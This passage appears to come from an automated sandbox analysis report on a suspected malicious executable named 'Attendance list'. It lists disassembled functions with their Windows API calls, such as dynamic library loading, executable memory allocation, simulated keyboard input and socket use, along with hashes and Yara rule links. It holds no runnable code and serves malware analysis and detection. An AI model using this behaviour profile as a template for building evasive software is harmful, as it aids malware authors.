                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: RegDeleteKeyExW$advapi32.dll
                        • API String ID: 2574300362-4033151799
                        • Opcode ID: eea20a09745a599ba1d573e091da60f8c3849707796055119c3a238992f690ce
                        • Instruction ID: ac614f90777f79ffcc0a7d6a8ee4065c6b4daa7462a6b4ba2437927e3a6dd047
                        • Opcode Fuzzy Hash: eea20a09745a599ba1d573e091da60f8c3849707796055119c3a238992f690ce
                        • Instruction Fuzzy Hash: 81D01775924713CFD7209F35D828E5A76E8AF5A365F11CD3AA49ADA150EB70C8C0CA50
                        Function 009393F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00939009,?,0094F910), ref: 00939403
                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00939415
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetModuleHandleExW$kernel32.dll
                        • API String ID: 2574300362-199464113
                        • Opcode ID: 54e012d0bbff00354ddb5ab62f12d17c04bcea8a864be6f1b5032d65ff2da2b5
                        • Instruction ID: b36dddb3fee25145138d04c4af0fb6d3c5c87f4247849909b581b83161b23aa5
                        • Opcode Fuzzy Hash: 54e012d0bbff00354ddb5ab62f12d17c04bcea8a864be6f1b5032d65ff2da2b5
                        • Instruction Fuzzy Hash: EDD01275518723DFD7205F31DA1CA0776D9AF46355F15C8399485D6560E6B0C480DA50
                        Function 009176C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d9a626bdef1d65a58f92ada642c49b1afb9bec4050c0f2ec1efd2c58024f34f6
                        • Instruction ID: 41351f53f015e8d5cf9270159f5602490501e778711be471a286d95d2bba8564
                        • Opcode Fuzzy Hash: d9a626bdef1d65a58f92ada642c49b1afb9bec4050c0f2ec1efd2c58024f34f6
                        • Instruction Fuzzy Hash: B4C12A75B0421AEFDB14CF94C884AAEF7B9FF48714B258599E805EB251D730EE81CB90
                        Function 0093E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                        Download Yara Rule
                        APIs
                        • CharLowerBuffW.USER32(?,?), ref: 0093E3D2
                        • CharLowerBuffW.USER32(?,?), ref: 0093E415
                          • Part of subcall function 0093DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0093DAD9
                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0093E615
                        • _memmove.LIBCMT ref: 0093E628
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: BuffCharLower$AllocVirtual_memmove
                        • String ID:
                        • API String ID: 3659485706-0
                        • Opcode ID: 6b84a78992979654ed7a3b8ca5dae71e0a4ab384039b8a0e0bcbb2cac1cd3765
                        • Instruction ID: a67570e382384fd428e9c54c35691e6cba7aef4cd7e94fa055f87b28784aae0d
                        • Opcode Fuzzy Hash: 6b84a78992979654ed7a3b8ca5dae71e0a4ab384039b8a0e0bcbb2cac1cd3765
                        • Instruction Fuzzy Hash: 17C124716083518FCB14DF28C480A6ABBE4FF89718F14896DF8999B391D771E946CF82
                        Function 009383A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                        Download Yara Rule
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 009383D8
                        • CoUninitialize.OLE32 ref: 009383E3
                          • Part of subcall function 0091DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0091DAC5
                        • VariantInit.OLEAUT32(?), ref: 009383EE
                        • VariantClear.OLEAUT32(?), ref: 009386BF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                        • String ID:
                        • API String ID: 780911581-0
                        • Opcode ID: 839c34aba0dcb1e8fb13ad366c3e8e37060c7c6bd309595023703dd7cc32e8a7
                        • Instruction ID: e521a9cb35ff7920675b640bccaba6b83e499b72f2dd33434031907935ef8358
                        • Opcode Fuzzy Hash: 839c34aba0dcb1e8fb13ad366c3e8e37060c7c6bd309595023703dd7cc32e8a7
                        • Instruction Fuzzy Hash: 54A102752047119FCB10DF19C885B2ABBE5BF88714F15488CF99A9B3A2CB34ED04CB82
                        Function 00917A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                        Download Yara Rule
                        APIs
                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00952C7C,?), ref: 00917C32
                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00952C7C,?), ref: 00917C4A
                        • CLSIDFromProgID.OLE32(?,?,00000000,0094FB80,000000FF,?,00000000,00000800,00000000,?,00952C7C,?), ref: 00917C6F
                        • _memcmp.LIBCMT ref: 00917C90
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FromProg$FreeTask_memcmp
                        • String ID:
                        • API String ID: 314563124-0
                        • Opcode ID: 0750304d95f02c164e92121d51b3a3473f3f8f6302305f22b55fa44b2cf77846
                        • Instruction ID: c4ee05721dde9642533f335575ba598d9b77cf47d5ca6caed7186a4bb2296eab
                        • Opcode Fuzzy Hash: 0750304d95f02c164e92121d51b3a3473f3f8f6302305f22b55fa44b2cf77846
                        • Instruction Fuzzy Hash: 21812A75A0410AEFCB04DFD4C984EEEB7B9FF89315F204598E506AB250DB71AE45CB60
                        Function 00916DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Variant$AllocClearCopyInitString
                        • String ID:
                        • API String ID: 2808897238-0
                        • Opcode ID: 78be3d9894e93bff7107fbb727a879f42aa0249c101e47e72df34ef93b489a45
                        • Instruction ID: 3eb85402f2816741bd484149fbdde31d9c1d51286bf87aa416fa2e74075c17b2
                        • Opcode Fuzzy Hash: 78be3d9894e93bff7107fbb727a879f42aa0249c101e47e72df34ef93b489a45
                        • Instruction Fuzzy Hash: ED51963470830A9ADB24AFA9D495BA9F3F9EF49310F208C1FE596C7291DE74D8C19B11
                        Function 00949A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(00FFE640,?), ref: 00949AD2
                        • ScreenToClient.USER32(00000002,00000002), ref: 00949B05
                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00949B72
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$ClientMoveRectScreen
                        • String ID:
                        • API String ID: 3880355969-0
                        • Opcode ID: 121a5264e864878de8a142f874e9f50cd9a2100c6fb7bddb9e1c4f603323bc5b
                        • Instruction ID: 6aac0b5377df4a718bcadca7decaf84b00ee187227fda9594844a6e00b184b95
                        • Opcode Fuzzy Hash: 121a5264e864878de8a142f874e9f50cd9a2100c6fb7bddb9e1c4f603323bc5b
                        • Instruction Fuzzy Hash: 4A511C34A00209EFDF14DF68E981EAE7BB9FF55360F148269F8159B290D730AD41DB90
                        Function 00936CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                        Download Yara Rule
                        APIs
                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00936CE4
                        • WSAGetLastError.WSOCK32(00000000), ref: 00936CF4
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00936D58
                        • WSAGetLastError.WSOCK32(00000000), ref: 00936D64
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ErrorLast$__itow__swprintfsocket
                        • String ID:
                        • API String ID: 2214342067-0
                        • Opcode ID: 4575cad1ae773118140e7903d811a89288d29ae2e6bf668a448edd29fbc5776a
                        • Instruction ID: 9b043c6e760f80d3148dc0569fff53de414680c8cfc642f88b66e07046aa4169
                        • Opcode Fuzzy Hash: 4575cad1ae773118140e7903d811a89288d29ae2e6bf668a448edd29fbc5776a
                        • Instruction Fuzzy Hash: 3D419275740210AFEB10AF28DC8AF6A77B9EB44B10F44C45CFA59DB2D2DA749C008B92
                        Function 0093672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                        Download Yara Rule
                        APIs
                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0094F910), ref: 009367BA
                        • _strlen.LIBCMT ref: 009367EC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _strlen
                        • String ID:
                        • API String ID: 4218353326-0
                        • Opcode ID: 7b1c738c790340d7e8cfdc0bde9abcfee31a9238f6b805d56ff248a681f2f8e5
                        • Instruction ID: 787905d38092fe20e83427888ddb397fc56a5ddc21fa1c068afe97d1a74038ea
                        • Opcode Fuzzy Hash: 7b1c738c790340d7e8cfdc0bde9abcfee31a9238f6b805d56ff248a681f2f8e5
                        • Instruction Fuzzy Hash: 6041AF35A00204ABCB14EBA8DCD5FAEB7B9EF48314F148169F9169B292DF30ED40CB51
                        Function 0092BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0092BB09
                        • GetLastError.KERNEL32(?,00000000), ref: 0092BB2F
                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0092BB54
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0092BB80
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CreateHardLink$DeleteErrorFileLast
                        • String ID:
                        • API String ID: 3321077145-0
                        • Opcode ID: 2eb17f68df266c04d15a924cde705886def0fddc247fb1e8da21eed1bca596b8
                        • Instruction ID: 08f8cd2d6142067df7eec0041539534d896e978182d32aa5e63620ad1f12afcf
                        • Opcode Fuzzy Hash: 2eb17f68df266c04d15a924cde705886def0fddc247fb1e8da21eed1bca596b8
                        • Instruction Fuzzy Hash: E4411C39200921DFCB10EF19D588E59BBF1FF49710B098498E88A9B366CB34FD05DB92
                        Function 00948AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                        Download Yara Rule
                        APIs
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00948B4D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: InvalidateRect
                        • String ID:
                        • API String ID: 634782764-0
                        • Opcode ID: 13f739dceb36c0d74296a5f416ec430dfb3915fdbbc737a4a416c0fec942a964
                        • Instruction ID: 86b8464c6c1f8ea9afc5f81b329e7b6b9ff45cee72e308490d566f55a871b2ba
                        • Opcode Fuzzy Hash: 13f739dceb36c0d74296a5f416ec430dfb3915fdbbc737a4a416c0fec942a964
                        • Instruction Fuzzy Hash: 9A31E2B4654208BFEF249E58CC95FBF37A8FB06320F244A16FA51D62A0DE34A9409B41
                        Function 0094ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                        Download Yara Rule
                        APIs
                        • ClientToScreen.USER32(?,?), ref: 0094AE1A
                        • GetWindowRect.USER32(?,?), ref: 0094AE90
                        • PtInRect.USER32(?,?,0094C304), ref: 0094AEA0
                        • MessageBeep.USER32(00000000), ref: 0094AF11
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Rect$BeepClientMessageScreenWindow
                        • String ID:
                        • API String ID: 1352109105-0
                        • Opcode ID: 57f3f57d0995cd3aa006dc1bb0541bf6f32a8e8364896847a49967f542217ac5
                        • Instruction ID: cba08c86ff46a78886e06d3b7a30834caea4b787759ad9d969998c877ecd23bb
                        • Opcode Fuzzy Hash: 57f3f57d0995cd3aa006dc1bb0541bf6f32a8e8364896847a49967f542217ac5
                        • Instruction Fuzzy Hash: 7D418D7465411ADFCB11CF58C884F6ABBF5FF89350F1481A9E8288B351D730A801DF92
                        Function 00920FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00921037
                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00921053
                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 009210B9
                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0092110B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: 91eb55f96fcbade9ff8f18451459da487bab80aaa4f4ad8f0edf3afbc513235f
                        • Instruction ID: caacf7a415f4e566105b62d0517bfc9275a54ee317aad9c7f3ef72b33c58babe
                        • Opcode Fuzzy Hash: 91eb55f96fcbade9ff8f18451459da487bab80aaa4f4ad8f0edf3afbc513235f
                        • Instruction Fuzzy Hash: F2316E30EC46B8AEFF308B65AC05BFABBADABA5310F14431AF580521D9C3744DE19791
                        Function 00921121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00921176
                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00921192
                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 009211F1
                        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00921243
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: 1c04b16f4423611ada643b770d5c439cc62ecfc8be1f0f30764d970ebd529cbd
                        • Instruction ID: f318f2cd832d36fe0481487311e1f8c1b5ad0f25b23fbd2976a4c7feb6b65907
                        • Opcode Fuzzy Hash: 1c04b16f4423611ada643b770d5c439cc62ecfc8be1f0f30764d970ebd529cbd
                        • Instruction Fuzzy Hash: A5315A30A4832C9EFF348F65AC15BFA7BBEABA9310F04435AF590921DAC33849749751
                        Function 008F6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008F644B
                        • __isleadbyte_l.LIBCMT ref: 008F6479
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008F64A7
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008F64DD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: 5e1fae7d2d651e3699b3ab5c796c017d7fefc2c29f0b913e454d75f049b7bdf9
                        • Instruction ID: 67790f8720b4044bbed87a3bf33934c4c5ec75dfc2745d6db16394d57cc736a8
                        • Opcode Fuzzy Hash: 5e1fae7d2d651e3699b3ab5c796c017d7fefc2c29f0b913e454d75f049b7bdf9
                        • Instruction Fuzzy Hash: 8A31EF3060024EAFDB21AF75C845ABA7BB5FF11310F154228E964C71A0E731D860DB94
                        Function 00945175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32 ref: 00945189
                          • Part of subcall function 0092387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00923897
                          • Part of subcall function 0092387D: GetCurrentThreadId.KERNEL32 ref: 0092389E
                          • Part of subcall function 0092387D: AttachThreadInput.USER32(00000000,?,009252A7), ref: 009238A5
                        • GetCaretPos.USER32(?), ref: 0094519A
                        • ClientToScreen.USER32(00000000,?), ref: 009451D5
                        • GetForegroundWindow.USER32 ref: 009451DB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                        • String ID:
                        • API String ID: 2759813231-0
                        • Opcode ID: c83f569f22e4672d3f9031bfb3645bed215918e12d2243bacbfa4a92d8cb06ae
                        • Instruction ID: 7785d73475b8f13fa32a7078bca2930759c406f6c852971c9fb1ebbf93fc7550
                        • Opcode Fuzzy Hash: c83f569f22e4672d3f9031bfb3645bed215918e12d2243bacbfa4a92d8cb06ae
                        • Instruction Fuzzy Hash: 25312D75900118AFDB00EFA9C885EEFB7FDEF98300F1040AAE455E7241EA759E45CBA1
                        Function 0094C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • GetCursorPos.USER32(?), ref: 0094C7C2
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,008FBBFB,?,?,?,?,?), ref: 0094C7D7
                        • GetCursorPos.USER32(?), ref: 0094C824
                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,008FBBFB,?,?,?), ref: 0094C85E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
